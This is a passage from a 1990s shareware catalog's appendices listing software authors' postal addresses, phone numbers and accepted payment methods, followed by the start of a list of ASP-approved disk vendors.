Author: CROSSDOWN [Sam Bellotto Jr.] + Address: 133 Akron St., Rochester, NY 14609-7618 + Orders & queries: 716-482-8092 + + Product: ClipMate for Windows + Author: Thornton Software Solutions + Address: P.O. Box 26263, Rochester, NY 14626 + Orders & queries: 716-227-6505 + Accepts: MasterCard, Visa + Fax: 716-227-1145 + + Product: CD-ROM Guide + Author: Save the Planet Software [Roger & Kathy Cox] + Address: P.O. Box 45, Pitkin, CO 81241 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 303-641-5035 + + Products: Calling Cards, Charging, Checking, Public Library, + WinCharging + Author: My Little Realm Enterprises + Address: 22 Church Street #103, Suite 376, Ramsey, NJ 07446 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 201-529-8318 + + Product: XED + Author: David L. Dight + Address: P.O. Box 280, Kings Cross, New South Wales 2011 + AUSTRALIA + Orders & queries: +61-2-3314521 + Accepts: + Fax: +61-2-2339393 + + Products: AeroChart, LEANER, Me & My Metabolism + Author: MoonStone Software + Address: 6 Herrada Road, Santa Fe, NM 87505 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 505-982-7251 + + Product: METRIC-X + Author: Orion Development Corporation [Richard Long] + Address: P. O. Box 2323, Merrifield, VA 22116-2323 + Orders: 800-992-8170 (orders only, please) + Fax: 703-802-0089 + Queries: 703-802-0088 + + Appendix A, "Author addresses" 688 + + + + Products: Diamond Data, On This Day, On This Day for Windows + Author: The Software Construction Co. + Address: PO Box 160, North Billerica, MA 01862-0160 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 508-851-6204 + + Product: PC Chart + Author: Guru Systems Ltd. [Gene Quong] + Address: 3873 Airport Way, Box 9754, Bellingham, WA 98227 + Orders & queries: 604-299-1010 + Accepts: MasterCard, Visa + Fax: 604-299-1099 + + Products: ARCHIVE TRACKER, ARROW TRACKER, MERIT BADGE TRACKER, + PACK TRACKER, POST TRACKER, RANGER TRACKER, SHIP TRACKER, + TRAINING TRACKER, TROOP TRACKER, TROOP TRACKER 4 GIRLS + Author: Robert Barrentine Consulting + Address: 3211/2 Gorman Avenue, Laurel, MD 20707-4707 + Orders & queries: 301-490-7104 + Fax: 301-490-4168 + + Product: DEXTER Text Editor + Author: FAGERLUND CONSULTING + Address: Lonsdale West Postal Outlet, Box 54053, North + Vancouver, B.C., CANADA, V7M 3L5 + Orders & queries: 604-984-7330 + Accepts: MasterCard, Visa + + Product: Lotto Thunder (PICK-6 Version) + Author: Charles P.Staats + Address: P.O. Box 29151, Brooklyn Center, MN 55429 + + Product: MAPIT + Author: Allison Software [John B. Allison] + Address: 166 Shady Lane, Apollo, PA 15613 + Orders & queries: 412-727-2198 + Accepts: MasterCard, Visa + + Products: PCStat, $mart Gambler + Author: PC Information Systems [Roy Schoenbeck] + Address: 310 Rue de La Lavanda, Sparks, NV 89434-9524 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 702-342-0376 + + Appendix A, "Author addresses" 689 + + + + Product: CMFiler + Author: NoVaSoft + Address: 3239 Riverview Dr., Triangle, VA 22172 + Orders & queries: 703-221-1833 + + Products: QPACS, XPENS + Author: Richard A. Williams + Address: P.O. Box 1311, Crystal Lake, IL 60039 + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 815-455-6333 + + Products: By the Numbers, Citizen, Cliche Finder, Content Label + Rating, Creativity Package, Crystal Ball, Curses!, Fortune + Teller, Geomancy, Kid's Art, Little Lists, Mayan Calendar, + Personal Challenge, Personal Tarot, Poetry Generator, Practical + Joke Collection, Recap, The Richard Webster System, Workbase, + Wynter Stone's I Ching, Wynter Stone's Quick Guide, Your ESP + Test + Author: R.K. West Consulting [Rosemary K. West] + Address: P.O. Box 8059, Mission Hills, CA 91346 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 818-366-1737 + + Products: 4EDIT, 4ZIP/4UNZIP, USEMGR, XDIR + Author: XD Systems [Iram J. Weinstein] + Address: 1014 Shipman Lane, McLean, VA 22101 + Orders & queries: 703-821-3215 + + Product: SwimBase + Author: Words to Go + Address: 2710 Apple Way, Dunkirk, MD 20754 + Orders & queries: 301-855-6427 + + Products: CD-QUICK Cache, PC-ECAP + Author: Circuit Systems + Address: 418 Church Road, Sicklerville, NJ 08081-1727 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 609-875-5433 + + Products: Jasc Media Center, Paint Shop, Paint Shop Pro, + Professional Capture Systems + Author: JASC, Inc. + Address: PO Box 44997, Eden Prairie, MN 55344 + Orders: 800-622-2793 (orders only, please) + Accepts: MasterCard, Visa + Fax: 612-930-9172 + Queries: 612-930-9171 + + Appendix A, "Author addresses" 690 + + + + Products: Book Librarian, Household Register, SoundMasterDb, + Video Librarian + Author: TurboSystemsCo [Lemuel D. Turner] + Address: P.O. Box 965368, Marietta, GA 30066 + Orders: 800-257-7221 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 404-591-4988 + Queries: 404-516-8575 + + Products: CMTS (Church Mbr. Tracking Sys), OMS (Organizational + Mgmt System + Author: Torbert Data Systems, Inc. + Address: P.O. Box 9218, Chesapeake, VA 23321 + Orders & queries: 804-488-5506 + Accepts: MasterCard, Visa + Fax: 804-488-8630 + + Products: Calculation Solitaire, Canfield for Windows, + MicroPlayerCD(tm), ZiPaper + Author: Daniel Thomas + Address: 2301 North Huron Circle, Placentia, CA 92670 + Queries: 714-524-5625 + + Products: Integrity Master(tm), MAZE3 + Author: Stiller Research [Wolfgang Stiller] + Address: 2625 Ridgeway St., Tallahassee, FL 32310 + Orders: 800-788-0787 (orders only, please) + Accepts: MasterCard, Visa + Fax: 904-575-7884 + Queries: 904-574-0920 + + Product: Brother's Keeper + Author: John Steed + Address: 6907 Childsdale, Rockford, MI 49341 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 616-866-3345 + + Product: CashMaster + Author: Contractor Information Systems, Inc. [Seymour Halpern + and Tom Sollas, III] + Address: P O Box 1028, Toms River, NJ 08754-1028 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 908-288-1504 + Queries: 908-288-1502 + + Products: Btr Help!, Btr Watch, Mass-Store Copy, Volcano Hunter + Author: Informative Technologies + Address: 1718 M Street NW, Suite 292, Washington, DC, + 20036-4504 + Orders: 800-2424-PSL (orders only, please) + Fax: 202-676-4529 + Queries: 202-675-4528 + + Appendix A, "Author addresses" 691 + + + + Product: Recon + Author: Amdox Corp. [Orest Skrypuch] + Address: 217 Terrace Hill St., Brantford, ON N3R 1G8 CANADA + Orders: 519-752-5453 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 519-753-7867 + + Products: DIFF, HiMOVE, HiVIDEO, WDiff + Author: C.Sitte Softwaretechnik [Chris Sitte] + Address: A-5322 Hof 320, AUSTRIA + Accepts: American Express, MasterCard, Optima, Visa + + Products: DOS Summary, DOS Summary (Hypertext), TUTOR.COM + Author: Computer Knowledge + Address: PO Box 91176, Los Angeles, CA 90009-1176 + + Products: BATUTIL, STACKEY + Author: CTRLALT Associates + Address: Suite 133, 260 South Lake Ave., Pasadena, CA 91101 + Orders: 800-788-0787 (orders only, please) + Fax: 314-966-1833 + + Product: EDDY (EDit DirectorY) + Author: John Scofield [John Scofield] + th + Address: 117 W. Harrison Bldg., 6 floor, Suite S-678, + Chicago, IL 60605 USA + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 692 + + + + Product: BakupWiz + Author: PCX + Address: 3525 Del Mar Heights Rd, Ste 313, San Diego, CA 92130 + Orders & queries: 619-259-9797 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 619-481-6474 + + Product: PC-FOOD II FOOD COSTING + Author: SCHRECK SOFTWARE + Address: 1420 Interlachen Circle, Woodbury, MN 55125 + Orders & queries: 612-731-6822 + + Product: Time is Money + Author: Custom Data Solutions [Martin Schiff] + Address: 248 Wood Lake Drive, Maitland, FL 32751 + Orders & queries: 407-767-9278 + Accepts: MasterCard, Visa + + Products: AlbumMaster, AlbumMaster For Windows, BitMapZ For + Windows, CassetteMaster, CassetteMaster For Windows, CDMaster, + CDMaster For Windows, DayMaster, LessonPlanZ, OMNIDay, OMNIDay + For Windows, PostCardMaster, ScrollZ, SensuVoX I, ShotZ, + SoundZ, SoundZ For Windows, VideoMaster, VideoMaster For + Windows, Zpeller + Author: Unicorn Software Limited [Charles P. Schell IV] + Address: P.O. Box 117, Knob Noster, MO 65336-0117 + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 816-429-3558 + Queries: 816-429-3558 + + Products: BabySpool, DISK SPOOL II + Author: Budget Software Company [Mike Samuels] + Address: P.O. Box 621534, Littleton, CO 80162 + Orders & queries: 303-932-1705 + Accepts: MasterCard, Visa + Fax: 303-932-0336 + + Product: BOOT.SYS + Author: Salvisberg Software & Consulting [Hans Salvisberg] + Address: Bellevuestr. 18, CH-3095 Berne, SWITZERLAND + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +41-31-972-42-10 + + Appendix A, "Author addresses" 693 + + + + Products: Technical Editor (DOS), Technical Editor (OS/2), + Technical Editor (Windows NT), U.S. Geography Tutor + Author: On-Target Software [Michael Russo] + Address: P.O. Box 17355, Irvine, CA 92714 + Orders & queries: 415-474-9973 + Fax: 415-474-9307 + + Products: Brandon's Big Lunchbox, Brandon's Preschool Graphics + Lu, Personal Hotnet + Author: Robichaux and Associates [Joey Robichaux] + Address: PO Box 842621, Houston, TX 77284-2621 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 713-463-7452 + + Products: BLANK-IT, BLANK-IT API Specifications, EMERI, RISS + Font Pak #1, RISS Icon Pak, WINPAK #1 + Author: Rhode Island Soft Systems, Inc. + Address: P.O. Box 748, Woonsocket, RI 02895 + Orders: 800-959-7477 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 401-767-3108 + Queries: 401-767-3106 + + Products: 4DOS, 4DOS for Windows NT, 4OS2 + Author: JP Software Inc. + Address: PO Box 1470, E. Arlington, MA 02174 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 617-646-0904 + Queries: 617-646-3975 + + Products: PrintGF, PrintGL, Ravitz Editor + Author: Ravitz Software Inc. + Address: PO Box 25068, Lexington, KY 40524-5068 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 606-268-0577 + + Products: Simply Docs, Simply Help!, Simply Labels + Author: SimpleWare [Robert E. Pitcher] + Address: 34 Earle Street, Grand Falls-Windsor, NF A2B 1E9 + CANADA + Accepts: MasterCard, Visa + Fax: 709-489-9558 + + Appendix A, "Author addresses" 694 + + + + Products: Easydial, MegaBack Hard Disk Backup, PALERT, PATTR, + PCOPY, PDAILY, PDEL, PPRINT, PSEARCH, PTOUCH, Stowaway True + Archival System + Author: Patri-Soft [Norm Patriquin] + Address: 5225 Canyon Crest Dr., Suite 71-358, Riverside, CA + 92507 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 909-352-1527 + Queries: 909-352-2820 + + Products: DMPLAS (Dot Matrix to LaserJet), Fonts Ink Fonts, + GridForm, Layout + Author: Software Co-op + Address: 5437 Honey Manor Dr., Indianapolis, IN 46241 + Orders & queries: 317-856-6052 + Fax: 317-856-2086 + + Products: DasBOOT!, EGAWHEEL, VGAWHEEL, WINWHEEL + Author: WHEEL Games [Russell Mueller] + Address: 507 Washington Gdns, Washington, NJ 07882-9205 + + Product: The Window BOSS & Data Clerk + Author: Star Guidance Consulting, Inc. [Philip A. Mongelluzzo] + Address: 273 Windy Drive, Waterbury, CT 06705 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 203-755-8842 + Queries: 203-574-2449 + + Products: PC-AP, PC-AR, PC-GL, PC-PR, PCINV + Author: Medlin Accounting Shareware + Address: 1461 Sproul Avenue, Napa, CA 94559 + Orders & queries: 707-255-4475 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 707-255-9266 + + Product: COM-AND + Author: CABER Software + Address: P.O. Box 3607 MDSE MART, Chicago, IL 60657-0607 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 312-477-0925 + Queries: 310-439-6104 + + Products: PMZIP, WinZip + Author: Nico Mak Computing, Inc. + Address: P.O. Box 919, Bristol, CT 06011-0919 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 695 + + + + Products: Lotto Challenger, Windows Lotto + Author: Data Solutions + Address: 1529 Thistledown Drive, Brandon, FL 33510-2069 + Orders: 800-783-8934 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 813-653-3093 + Queries: 813-653-3093 + + Products: 4Print/4Book DOS, 4Print/4Book Windows + Author: Korenthal Associates, Inc. + Address: 511 Ave. of the Americas #400, New York, NY 10011 + Orders: 800-KA-PROGS (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 212-242-2599 + Queries: 212-242-1790 + + Product: FPLAN-KWIK Financial&Retire Pln + Author: First Financial Software [Ron Kline, CFP, MBA] + Address: P.O. Box 592967, Orlando, FL 32859-2967 + Orders & queries: 800-736-4920 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: ALITE, AS-EASY-AS, DRAFT CHOICE, ProtoCAD 3D, + StarFlic + Author: TRIUS, Inc. [David Schulz/Paris Karahalios] + Address: P.O. BOX 249, N. Andover, MA 01845-0249 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 508-688-6381 + Queries: 508-794-9377 + + Products: Crossword Clipper for DOS, Crossword Clipper for + Windows, Crossword Creator + Author: PC HELP-LINE + Address: 35250 Silver Leaf Circle, Yucaipa, CA 92399 + Orders & queries: 909-797-3091 + Fax: 909-797-3091 + + Products: DAYO ACCOUNTS PAYABLE (AP), DAYO ACCOUNTS RECEIVABLE + (AR), DAYO BACK ORDERS (BO), DAYO BAR CODE 3 OF 9, DAYO BILLING + & INVOICING, DAYO END OF PERIOD, DAYO GENERAL LEDGER (GL), DAYO + INDEX, DAYO INVENTORY, DAYO LITTLE POS, DAYO MEMBERSHIP, DAYO + MENU, DAYO MRP, DAYO ORDER ENTRY, DAYO PASSWORDS, DAYO PAYROLL, + DAYO POS (POINT OF SALE), DAYO PRICE BOOK, DAYO QUOTES, DAYO + RENTAL POS, DAYO RETURN MANAGEMENT SYSTEM, DAYO SALES + MANAGEMENT SYSTEM, DAYO SERVICE DISPATCH, DAYO SIMPLE POS, DAYO + SMART REPORTS, DAYO TIME & BILLING + Author: TJS LAB, Inc. + Address: 5104 N. Orange Blossom Trail, #200, Orlando, FL 32810 + Orders: 800-525-3296 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 407-295-2171 + Queries: 407-291-3960 + + Appendix A, "Author addresses" 696 + + + + Products: A86 Macro Assembler, D86 Debugger, ZIPKEY + Author: Eric Isaacson Software + Address: 416 E. University Ave., Bloomington, IN 47401-4739 + Orders & queries: 812-339-1811 + Accepts: American Express, MasterCard, Optima, Visa + + Products: Total Investor for 1-2-3 DOS, Total Investor for + 1-2-3 Window, Total Investor for Symphony + Author: Hughes Financial Services + Address: 2 West Hanover Avenue, Suite 212, Randolph, NJ 07869 + Orders & queries: 201-895-5665 + Fax: 201-895-5525 + + Product: Bottom Line Accounting + Author: WindSoft International, Inc. [Van B. Hooper, III] + Address: P.O. Box 590006, Orlando, FL 32859-0006 + Orders: 800-542-4405 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 407-240-2323 + Queries: 407-240-2300 + + Product: WinPost + Author: Eastern Mountain Software + Address: P.O. Box 6394, Bellevue, WA 98008 + Queries: 206-391-3483 + + Products: Ahelp Clipper Help Library, BBS Communications, DOS + Menu, EZ-Tree, Form Editor (FED), HDM - Hard Disk Menu, LAN + Menu, MicroFox DOS Utilities, PUT, GET, Install Utilities, SEE + (File Viewer) + Author: MicroFox Company [Jim Hass] + Address: 3310 Fox Run, PO Box 447, Richfield, OH 44286-0447 + Orders & queries: 216-659-9489 + Accepts: MasterCard, Visa + Fax: 216-659-9489 + + Products: Ample Notice, LQ + Author: Granny's Old-Fashioned Software + Address: 297 Camp Rock Road, Boone, NC 28607 + Orders & queries: 704-264-6906 + Fax: 704-264-4634 + + Product: PowerBatch + Author: CSD, Inc. + Address: 4437 Ormond Trace, Marietta, GA 30066 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 404-926-9590 + Queries: 404-926-9565 + + Appendix A, "Author addresses" 697 + + + + Products: DRIV_MAN, ENVI_MAN, FILE_MAN, LASR_MAN, MENU_MAN, + PATH_MAN, VIEW_MAN + Author: MicroMetric [David Groome] + Address: 98 Dade Avenue, Sarasota, FL 34232-1609 + Orders: 800-929-0184 (orders only, please) + Accepts: + Fax: 813-377-2091 + Queries: 813-377-2515 + + Product: Flu_Shot+ + Author: Software Concepts Design + Address: Virus Acres, New Kingston, NY 12459 + Orders & queries: 914-586-2023 + Accepts: MasterCard, Visa + Fax: 914-586-2025 + + Product: BlackJack! + Author: Glencoe Computing [Donald L. Granger] + Address: 2025 Wakefield Lake, Glencoe, MO 63038-1404 + Orders & queries: 314-458-2863 + Accepts: MasterCard, Visa + + Products: FreeForm, MAXI Form, Nominal Pipe Size for Windows, + NPS - Nominal Pipe Size, Over_LAZ HP, Over_LAZ PS + Author: Herne Data Systems Ltd + Address: PO Box 250, Tiverton, Ontario, CANADA N0G 2T0 + Orders & queries: 519-366-2732 + Accepts: MasterCard, Visa + Fax: 519-366-2732 + + Products: QFiler, QFont + Author: Jamestown Software + Address: 2508 Valley Forge Drive, Madison, WI 53719 + Orders & queries: 608-271-2090 + + Products: The Book Collector (New & Rare), EGA Mouse Paint, + FontMe!, HouseHold TRACKER, Melissa's Music Flashcards, + Personal Time Card + Author: Fischer Grafix & Software + Address: P.O. Box 606, Midway City, CA 92655 + Orders & queries: 714-898-7262 + Accepts: + Fax: 714-898-7262 + + Product: dPerfect Merge + Author: Newdorf Research [Barbara J. Feldman] + Address: 4212 North Lane, Del Mar, CA 92014 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 619-793-9933 + Queries: 619-793-8300 + + Appendix A, "Author addresses" 698 + + + + Products: AntiC, ATC: Air Traffic Controller, Basic Training, + Bible Timeline, Bible Timeline for Windows, Border, Capbuf, + CHRONOS, CHRONOS:Windows in Time, Cryptik, Ecomaster, + Fictionary, GREEN, Palette Pleezer, PEG, Quilt, Super VGA + Puzzle, Swimsuit, Towers, UDECIDE, WEBS, WINZLE, XFIRE: Action + Puzzle game + Author: Cascoly Software [Steve Estvanik] + th + Address: 4528 36 Ave NE, Seattle, WA 98105 + Orders & queries: 206-523-6135 + Fax: 206-523-6135 + + Product: QA Study Aid + Author: Quid Pro Quo Software [Hal Endresen] + Address: P.O. Box 1248, Cedar Rapids, IA 52406-1248 + Orders & queries: 319-378-9140 + Accepts: MasterCard, Visa + + Products: ALL-PRO League Scheduler, StatTrak for Baseball + Author: ALL-PRO Software Inc. + Address: 30 Maple View Court, Madison, WI 53719 + Orders: 800-776-7859 (orders only, please) + Accepts: MasterCard, Visa + Queries: 608-271-1586 + + Products: FileFinder, Shez + Author: California Software Design [Jim Derr] + Address: P.O. Box 15284, Santa Rosa, CA 95402 + Orders & queries: 707-575-9868 + Accepts: MasterCard, Visa + + Product: Lotto Prophet + Author: DataMicro, Inc. + Address: P.O. Box 3527, Port Charlotte, FL 33948 + Orders: 800-336-7720 (orders only, please) + Fax: 813-625-2285 + Queries: 813-629-7720 + + Appendix A, "Author addresses" 699 + + + + Product: T-Zero + Author: Dennis M. Cunningham + rd + Address: 25-6 NW 23 Pl. #405, Portland, OR 97210-3534 + Orders & queries: 503-227-7751 + + Product: VERSAMAP + Author: Charles H. Culberson + Address: 8 Ritter Lane, Newark, DE 19711 + Orders & queries: 302-731-0694 + + Products: PATIENCE 10, Patience Abroad + Author: CoCoWare - Cowles Company Software [David A. Cowles] + Address: P.O. Box 151481, Fort Worth, TX 76108-5481 + Orders & queries: 817-367-3603 + Fax: N-A + + Products: Chris's Automobile Recorder, DR. Memory + Author: Cooney Applied Technology + Address: P.O. Box 292039, Kettering, OH 45429-0039 + + Product: Capital Gainz + Author: AlleyCat Software, Inc. [Dave Cohen] + Address: P.O. Box 14446, RTP, NC 27709-4446 + Orders & queries: 919-542-6117 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 919-542-6611-(BBS) + + Products: Plain Vanilla Labels, Rosewood Journal + Author: Rosewood Software [Bert Christensen] + Address: 135-10 Livonia Place, Scarborough, Ontario M1E 4W6 + CANADA + Orders & queries: 416-284-6119 + + Product: PCM100.COM + Author: Charier Consultants Services + Address: 64 Rue de Charenton, 75012 Paris, FRANCE + Orders & queries: 331-4001-9415 + Fax: 331-4001-0493 + + Product: EXTENDED BATCH LANGUAGE-PLUS! + Author: Seaware Corp. + Address: P.O. Box 1656, Delray Beach, FL 33444 + Orders: 800-634-8188 (orders only, please) + Accepts: MasterCard, Visa + Fax: 407-738-1712 + Queries: 407-738-1712 + + Appendix A, "Author addresses" 700 + + + + Product: Helpgen + Author: Rimrock Software + Address: P.O. Box 2406, Hayden, ID 83835-2406 + Orders & queries: 208-772-9347 + + Product: Amortz - Loan Schedules & More! + Author: Mountain View Software [Jim Bowyer] + th + Address: 7506 85 St E., Puyallup, WA 98371-6514 + Orders & queries: 206-845-2744 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: PopDBF + Author: Lighthouse Software, Inc. + Address: PO Box 9601, Peoria, IL 61612 + Orders: 800-242-4775 (orders only, please) + Accepts: + Fax: 309-673-9895 + Queries: 309-673-9886 + + Products: BOOKLET, Smart10 + Author: Sympathetic Software [Stephen L Billard] + Address: 9531 Telhan Drive, Huntington Beach, CA 92646 + Orders: 800-242-4775 (orders only, please) + + Product: ICP + Author: Spirit7 Software, Ltd. [Scott Bigler] + Address: PO Box 777, Waynesboro, VA 22980 + Orders & queries: 703-943-4635 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 703-943-4635 + + Products: EXPRESSCALC, EXPRESSCHECK, EXPRESSGRAPH, FILE + EXPRESS, ON-SIDE + Author: Expressware Corporation + Address: PO Box 1800, Duvall, WA 98019 + Orders: 800-753-3453 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 206-788-4493 + Queries: 206-788-0932 + + Appendix A, "Author addresses" 701 + + + + Product: Rubicon Publisher + Author: Rubicon Computer Labs Inc. + Address: Box 336, Chelsea, QC, J0X 1N0 CANADA + Orders & queries: 819-770-4317 + Fax: 819-770-4317 + + Products: Drag And View, Drag And Zip, Hard Disk Director + Author: Canyon Software [Dan Baumbach] + Address: 1537 Fourth Street, Suite 131, San Rafael, CA 94901 + Orders & queries: 415-382-7999 + Accepts: MasterCard, Visa + Fax: 415-382-7998 + + Products: DISKLIST, SHERLOCK + Author: Gulf Sierra + Address: 14809 Clavel Street, Rockville, MD 20853-1543 + Orders & queries: 301-460-0354 + + Product: ELFTREE + Author: Elvish Consulting [Alan Avery] + Address: 1408 Noble Ave, Springfield, IL 62704-3450 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 217-789-6169 + Queries: 217-698-8600 + + Products: BassMap, Cipher, Cipher for Windows, Dragons Bane: + Mah Jongg II, EGATrek, Mah Jongg-Solitaire, MouseTools, Second + Guess, Shooting Gallery, SuperFly, Tile Match + Author: Arcanum Computing [Nels Anderson] + Address: 585 Edmands Road, Framingham, MA 01701-3088 + Accepts: MasterCard, Visa + Fax: 508-788-1363 + + Products: GEMCAP, PC-Draft II, PC-Draft-CAD + Author: Natural Software [Michael Allen] + Address: 19 South Fifth Street, St. Charles, IL 60174 + Orders & queries: 708-377-7320 + Accepts: + + Product: Managing Your Food + Author: MYF Software [Greg Aakhus] + Address: 1504 Chinquapin Court, Bakersfield, CA 93309 + Orders: 800-995-1605 (orders only, please) + Accepts: MasterCard, Visa + Fax: 805-396-9442 + Queries: 805-398-1449 + + Products: BOXER/DOS Text Editor, BOXER/OS2 Text Editor + Author: Boxer Software [David R. Hamel] + Address: P.O. Box 3230, Peterborough, NH 03458-3230 + Orders: 800-982-6937 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 603-924-4471 + Queries: 603-924-6602 + + Appendix A, "Author addresses" 702 + + + + Products: CATALOG-ON-A-DISK, DARN! Don't Forget!, Electronic + Postal Window(tm) + Author: EmmaSoft Software Company, Inc. + Address: PO Box 238, Lansing, NY 14882-0238 + Orders & queries: 607-533-4685 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 607-533-3524 + + Products: ProDev*EPRICE, ProDev*MEMBER Church System, + ProDev*QUOTE Quote/Bid System + Author: Pro Dev Software [George Abbott] + Address: 545 Grover Road, Muskegon, MI 49442-9427 + Orders & queries: 616-788-2243 + Accepts: American Express, MasterCard, Optima, Visa + + Product: Personal Calendar (PC) for DOS + Author: FunStuff Software [Paul Munoz-Colman] + Address: 11645 Charter Oak Court, Suite 201, Reston, VA + 22090-4526 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 703-435-3130 + Queries: 703-435-1110 + + Products: Lecture, PCFDial, Qanalyst + Author: Barn Owl Software + Address: P.O. Box 1115, O'Fallon, IL 62269 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 618-632-2339 + Queries: 618-632-7345 + + Products: ASP List of Approved BBSs, ASP List of Approved + Vendors, ASP Vendor Member Application, How to join as a "beta" + author, IBM PC Author Application, Information about + copyrights, MacIntosh Author Application, Official ASP + Catalogs, Shareware Programmer's Guide, Shareware Reference + Guides + Author: Association of Shareware Professionals + Address: 545 Grover Rd., Muskegon, MI 49442 + Fax: 616-788-2765 + Queries: 616-788-5131 + + Appendix B, "Vendor addresses" 703 + + + + + + Appendix B + Vendor addresses + + This appendix lists each ASP-approved disk vendor. These + vendors have agreed to abide by ethical standards when offering + shareware. + + + $ave On $oftware + Address: PO Box 1312, Wilkes Barre PA 18703-1312 + Phone: 717-822-9531 + + A & J Office Services + Address: PO BOX 1800, WODEN ACT 2606 AUSTRALIA + Phone: 61-6-281-4860 + + A Business Company Inc + Address: 827 Foster Ave, Brooklyn NY 11230 + Phone: 718-434-1930 + + A to Z-Ware + Address: 475 College Blvd #6215, Oceanside CA 92057 + Phone: 619-941-3189 + + A.M.U.G.CD INC + th + Address: 4131 N 24 St #A-120, Phoenix AZ 85016 + Phone: 602-553-0066 + + Accurate Research Inc + Address: 1500 Wyatt Drive # 10, SANTA CLARA CA 95054 + Phone: 408-748-9988 + + Aces Research Inc + Address: 46750 Fremont Blvd # 107, Fremont CA 94538 + Phone: 510-683-8855 + + Adams Computer Sales + Address: 7322 Avalon Dr, Fayetteville NC 28303-2419 + Phone: 919-867-6181 + + Advantage Plus Distributors + Address: 211-C South Salem St, Apex NC 27502 + Phone: 919-362-8212 + + Affordable Software + Address: 21 Blaxland Street, PO Box 472, Martrville NSW 2036 + AUSTRALIA + Phone: 61-2-311-3539 + + Appendix B, "Vendor addresses" 704 + + + + Alphon Edugames + Address: 221 RIDLEY ROAD, BRIDGEMAN DOWNS QLD 4035 AUSTRALIA + Phone: 011 61 732632744 + + Alternative Personal Software + Address: RR #3 SideRoad 27, #9126, Orton ON L0N 1N0 CANADA + Phone: 519-855-9889 + + Altez + Address: 3737 Patchett Rd, Baldwinsville NY 13027 + Phone: 315-638-4160 + + American Systems and Software + Address: 612 S Bowie St, Weatherford TX 76086 + Phone: 817-599-5858 + + Andromeda Software, Inc + Address: PO Box 270672, Fort Collins CO 80527-0672 + Phone: 716-691-4510 + + Aptos Entertainment + Address: 2906 Jolley Drive, Burbank CA 91504 + Phone: 818-848-5702 + + Ares Informatica S.L. + Address: C/ Bellaterra 33, Cornella BARCELONA 08940 SPAIN + Phone: 34-9-3-376-81-50 + + Aringna + Address: PO Box 78 Lutong, Miri SARAWAK 98107 MALAYSIA + + Ascencion Media Productions + Address: Boterstraat 12, Schiedam Z.H. 3111NC NETHERLANDS + Phone: 31-10-473-8579 + + Atlantic Coast (The Software Source) + Address: The Shareware Village, Colyton DEVON EX13 6HA ENGLAND + Phone: 44 1297 552222 + + AutoShare Inc + Address: 2661 North Illinois St Ste #204, Swansea IL 62221 + Phone: 618-344-3899 + + Aztech New Media + Address: 1 Scarsdale Road, Don Mills ON M3B 2R2 CANADA + Phone: 416-449-4787 + + Barbara's Choice + th + Address: 1039 SE 196 Ave, Portland OR 97233 + Phone: 503-666-0596 + + Appendix B, "Vendor addresses" 705 + + + + Bas (Biblioteca Argentina de Shareware + Address: Escobar 3155, Capital Federal BA C.P.1419 ARGENTINA + Phone: 54-1-572-9417 + + Basic Bits & Bytes + Address: 1654 Beaupre, Madison Hgts MI 48071-2685 